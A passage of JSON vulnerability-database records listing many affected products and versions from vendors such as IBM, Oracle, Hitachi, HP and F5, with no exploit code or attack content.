"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2.2"
},
{
"_id": null,
"model": "linux mips",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "tiered storage manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.1.0-00"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.19"
},
{
"_id": null,
"model": "portal 6.2.1-ce-ga2-securit",
"scope": null,
"trust": 0.3,
"vendor": "liferay",
"version": null
},
{
"_id": null,
"model": "tivoli dynamic workload console",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.1"
},
{
"_id": null,
"model": "tiered storage manager software (linux(sles",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.3.0-00"
},
{
"_id": null,
"model": "primavera p6 enterprise project portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.2"
},
{
"_id": null,
"model": "big-ip edge gateway hf1",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.1"
},
{
"_id": null,
"model": "fusion middleware",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.21.0"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0"
},
{
"_id": null,
"model": "struts",
"scope": "ne",
"trust": 0.3,
"vendor": "apache",
"version": "2.3.16.2"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.25"
},
{
"_id": null,
"model": "primavera p6 enterprise project portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.4"
},
{
"_id": null,
"model": "leads",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1"
},
{
"_id": null,
"model": "device manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.1.0-00"
},
{
"_id": null,
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.3.0.2.0"
},
{
"_id": null,
"model": "infosphere balanced warehouse d5100",
"scope": null,
"trust": 0.3,
"vendor": "ibm",
"version": null
},
{
"_id": null,
"model": "tiered storage manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"_id": null,
"model": "security threat response manager 2013.2r8",
"scope": "ne",
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"_id": null,
"model": "tivoli system automation application manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.2"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.3"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.08"
},
{
"_id": null,
"model": "primavera p6 enterprise project portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "15.2"
},
{
"_id": null,
"model": "tuning manager software )",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.401"
},
{
"_id": null,
"model": "big-ip webaccelerator hf3",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"_id": null,
"model": "business process manager advanced",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.0"
},
{
"_id": null,
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1.1.0"
},
{
"_id": null,
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0.0-00"
},
{
"_id": null,
"model": "business process manager express",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.0"
},
{
"_id": null,
"model": "device manager software )",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0-00"
},
{
"_id": null,
"model": "device manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"_id": null,
"model": "global link manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-00"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.3"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"_id": null,
"model": "distributed marketing",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.6"
},
{
"_id": null,
"model": "knowledge",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.6.1"
},
{
"_id": null,
"model": "tiered storage manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0.0-00"
},
{
"_id": null,
"model": "sitescope",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "11.2"
},
{
"_id": null,
"model": "enterprise server x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandrakesoft",
"version": "5"
},
{
"_id": null,
"model": "raplication manager software (solaris(x6",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"_id": null,
"model": "connections",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.0.1.0"
},
{
"_id": null,
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0"
},
{
"_id": null,
"model": "tivoli storage manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.3.0"
},
{
"_id": null,
"model": "security siteprotector system",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.0"
},
{
"_id": null,
"model": "infosphere mashuphub",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.0"
},
{
"_id": null,
"model": "global link manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.2-01"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.04"
},
{
"_id": null,
"model": "device manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "8.0.0-00"
},
{
"_id": null,
"model": "raplication manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"_id": null,
"model": "global link manager software (solaris(x6",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-01"
},
{
"_id": null,
"model": "tivoli storage manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2"
},
{
"_id": null,
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.3-00"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-08-11-07"
},
{
"_id": null,
"model": "big-ip edge gateway hf5",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.0"
},
{
"_id": null,
"model": "security siteprotector system",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.1"
},
{
"_id": null,
"model": "device manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "8.0.0-06"
},
{
"_id": null,
"model": "vcenter server",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "5.5"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.01"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.2.1.0"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0"
},
{
"_id": null,
"model": "tivoli endpoint manager for remote control",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.0"
},
{
"_id": null,
"model": "identity manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.22"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5"
},
{
"_id": null,
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.5.0-02"
},
{
"_id": null,
"model": "weblogic portal",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.3.6.0"
},
{
"_id": null,
"model": "retail clearance optimization engine",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.0"
},
{
"_id": null,
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "4.2.0"
},
{
"_id": null,
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.2"
},
{
"_id": null,
"model": "sitescope monitors 11.32ip1",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "connections",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.0.1.1"
},
{
"_id": null,
"model": "rational insight",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.1.13"
},
{
"_id": null,
"model": "enterprise server",
"scope": "eq",
"trust": 0.3,
"vendor": "mandrakesoft",
"version": "5"
},
{
"_id": null,
"model": "tiered storage manager software (linux(rhel",
"scope": "ne",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-06"
},
{
"_id": null,
"model": "sitescope",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "11.11"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"_id": null,
"model": "websphere service registry and repository",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.3"
},
{
"_id": null,
"model": "tuning manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.2.1.2"
},
{
"_id": null,
"model": "sitescope",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "11.22"
},
{
"_id": null,
"model": "sitescope",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "11.1"
},
{
"_id": null,
"model": "business server",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "1x8664"
},
{
"_id": null,
"model": "infosphere balanced warehouse c3000",
"scope": null,
"trust": 0.3,
"vendor": "ibm",
"version": null
},
{
"_id": null,
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-05"
},
{
"_id": null,
"model": "tivoli netcool configuration manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.4.1"
},
{
"_id": null,
"model": "tivoli system automation application manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.1"
},
{
"_id": null,
"model": "jdeveloper",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.17.0"
},
{
"_id": null,
"model": "cognos business intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.1.1"
},
{
"_id": null,
"model": "tiered storage manager software (linux(sles",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0.0-00"
},
{
"_id": null,
"model": "tivoli composite application manager for application diagnostics",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.1"
},
{
"_id": null,
"model": "retail central office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.0"
},
{
"_id": null,
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.4"
},
{
"_id": null,
"model": "websphere service registry and repository",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2"
},
{
"_id": null,
"model": "retail returns management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.3"
},
{
"_id": null,
"model": "rational insight",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.1.12"
},
{
"_id": null,
"model": "contact optimization",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0"
},
{
"_id": null,
"model": "device manager software (linux(suse",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-00"
},
{
"_id": null,
"model": "rational insight",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.1.11"
},
{
"_id": null,
"model": "retail markdown optimization",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.0"
},
{
"_id": null,
"model": "content collector",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2"
},
{
"_id": null,
"model": "xp p9000 tiered storage manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "7.6.1-06"
},
{
"_id": null,
"model": "content analytics with enterprise search",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.0"
},
{
"_id": null,
"model": "device manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.3-00"
},
{
"_id": null,
"model": "icewall configuration manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "3.0"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.02"
},
{
"_id": null,
"model": "arx",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "6.1.1"
},
{
"_id": null,
"model": "enterprise data quality",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "9.0.11"
},
{
"_id": null,
"model": "primavera p6 enterprise project portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "16.1"
},
{
"_id": null,
"model": "tivoli netcool/omnibus web gui",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.3.1"
},
{
"_id": null,
"model": "device manager software (linux(sles",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0.1-02"
},
{
"_id": null,
"model": "tiered storage manager software (linux(suse",
"scope": "ne",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-06"
},
{
"_id": null,
"model": "tuning manager software )",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.2-01"
},
{
"_id": null,
"model": "xp7 global link manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "8.0.0-00"
},
{
"_id": null,
"model": "business process manager express",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.0"
},
{
"_id": null,
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-07"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.5"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.51"
},
{
"_id": null,
"model": "identity manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.1.7"
},
{
"_id": null,
"model": "tuning manager software (linux(suse",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-05"
},
{
"_id": null,
"model": "tiered storage manager software -00",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.1.1"
},
{
"_id": null,
"model": "weblogic portal",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.2.1.0"
},
{
"_id": null,
"model": "tiered storage manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-07"
},
{
"_id": null,
"model": "tivoli integrated portal",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.1"
},
{
"_id": null,
"model": "device manager software (solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.1-03(x64))"
},
{
"_id": null,
"model": "smart analytics system",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "20500"
},
{
"_id": null,
"model": "websphere service registry and repository",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0"
},
{
"_id": null,
"model": "records manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.4"
},
{
"_id": null,
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-00"
},
{
"_id": null,
"model": "retail central office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.0"
},
{
"_id": null,
"model": "business process manager advanced",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.0.1"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-08-00-03"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.1"
},
{
"_id": null,
"model": "tuning manager software (linux(rhel",
"scope": "ne",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-06"
},
{
"_id": null,
"model": "tivoli storage manager administration center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1"
},
{
"_id": null,
"model": "tivoli workload scheduler distributed",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"_id": null,
"model": "business process manager advanced",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.2"
},
{
"_id": null,
"model": "device manager software (solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.0-00(x64))"
},
{
"_id": null,
"model": "global link manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.1-01"
},
{
"_id": null,
"model": "websphere service registry and repository",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"_id": null,
"model": "cognos business intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.2.1"
},
{
"_id": null,
"model": "rational insight",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.1"
},
{
"_id": null,
"model": "business process manager advanced",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.1.2"
},
{
"_id": null,
"model": "websphere enterprise service bus",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2"
},
{
"_id": null,
"model": "connections",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.5.0.2"
},
{
"_id": null,
"model": "infosphere master data management collaborative edition",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "-10.1"
},
{
"_id": null,
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.2.0.2.0"
},
{
"_id": null,
"model": "xp p9000 replication manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "8.0.0-00"
},
{
"_id": null,
"model": "retail invoice matching",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1"
},
{
"_id": null,
"model": "connections",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.5.0.3"
},
{
"_id": null,
"model": "connections",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.0.1.1"
},
{
"_id": null,
"model": "tivoli workload scheduler distributed",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.6"
},
{
"_id": null,
"model": "business process manager advanced",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.1.2"
},
{
"_id": null,
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1.1"
},
{
"_id": null,
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.0"
},
{
"_id": null,
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "0"
},
{
"_id": null,
"model": "xp p9000 replication manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "8.0.0-06"
},
{
"_id": null,
"model": "omnifind enterprise edition",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1"
},
{
"_id": null,
"model": "sitescope",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "11.10"
},
{
"_id": null,
"model": "rational reporting for development intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.0"
},
{
"_id": null,
"model": "smart analytics system",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "57100"
},
{
"_id": null,
"model": "big-ip webaccelerator hf5",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"_id": null,
"model": "tivoli integrated portal",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.1.114"
},
{
"_id": null,
"model": "cognos business intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.4.1"
},
{
"_id": null,
"model": "device manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-07"
},
{
"_id": null,
"model": "business process manager advanced",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.1.1"
},
{
"_id": null,
"model": "cognos business intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.1"
},
{
"_id": null,
"model": "global link manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.1-00"
},
{
"_id": null,
"model": "big-ip edge gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.3"
},
{
"_id": null,
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.5.0-02"
},
{
"_id": null,
"model": "openpages grc platform",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0"
},
{
"_id": null,
"model": "tivoli system automation application manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.2.1"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-09-10-03"
},
{
"_id": null,
"model": "cognos business intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.2"
},
{
"_id": null,
"model": "security identity manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.0"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.5"
},
{
"_id": null,
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.2-00"
},
{
"_id": null,
"model": "device manager software (linux(suse",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"_id": null,
"model": "security qradar",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.1"
},
{
"_id": null,
"model": "distributed marketing",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5"
},
{
"_id": null,
"model": "sitescope monitors",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "11.20"
},
{
"_id": null,
"model": "secure analytics",
"scope": "eq",
"trust": 0.3,
"vendor": "juniper",
"version": "2012.1"
},
{
"_id": null,
"model": "business process manager advanced",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.5"
},
{
"_id": null,
"model": "device manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-00"
},
{
"_id": null,
"model": "rational insight",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.0.1"
},
{
"_id": null,
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.2"
},
{
"_id": null,
"model": "linux s/390",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.52"
},
{
"_id": null,
"model": "tiered storage manager software (linux(sles",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-07"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-08-00-02"
},
{
"_id": null,
"model": "content manager records enabler",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.4"
},
{
"_id": null,
"model": "retail invoice matching 12.0in",
"scope": null,
"trust": 0.3,
"vendor": "oracle",
"version": null
},
{
"_id": null,
"model": "rational reporting for development intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.0.4"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.1"
},
{
"_id": null,
"model": "knowledge",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.5.1"
},
{
"_id": null,
"model": "infosphere master data management server for product information",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.0"
},
{
"_id": null,
"model": "device manager software (solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.1-02(x64))"
},
{
"_id": null,
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.6"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.0.1"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.2.1.1"
},
{
"_id": null,
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.1"
},
{
"_id": null,
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.1.0-00"
},
{
"_id": null,
"model": "security qradar",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2"
},
{
"_id": null,
"model": "rational insight ifix1",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.0.1"
},
{
"_id": null,
"model": "tiered storage manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.1.0-00"
},
{
"_id": null,
"model": "ds8870",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.1"
},
{
"_id": null,
"model": "device manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-00"
},
{
"_id": null,
"model": "jboss fuse",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6.1.0"
},
{
"_id": null,
"model": "distributed marketing",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0"
},
{
"_id": null,
"model": "websphere partner gateway enterprise edition",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2"
},
{
"_id": null,
"model": "big-ip edge gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.2"
},
{
"_id": null,
"model": "rational reporting for development intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.0.3"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.53"
},
{
"_id": null,
"model": "tiered storage manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.0.34"
},
{
"_id": null,
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "4.1"
},
{
"_id": null,
"model": "global link manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-00"
},
{
"_id": null,
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.4"
},
{
"_id": null,
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.2.0.1.0"
},
{
"_id": null,
"model": "tiered storage manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-05"
},
{
"_id": null,
"model": "linux arm",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "ds8870",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.4"
},
{
"_id": null,
"model": "distributed marketing",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"_id": null,
"model": "centos",
"scope": "eq",
"trust": 0.3,
"vendor": "centos",
"version": "5"
},
{
"_id": null,
"model": "websphere enterprise service bus",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7"
},
{
"_id": null,
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.001"
},
{
"_id": null,
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "4.2.2143"
},
{
"_id": null,
"model": "tuning manager software",
"scope": "eq",
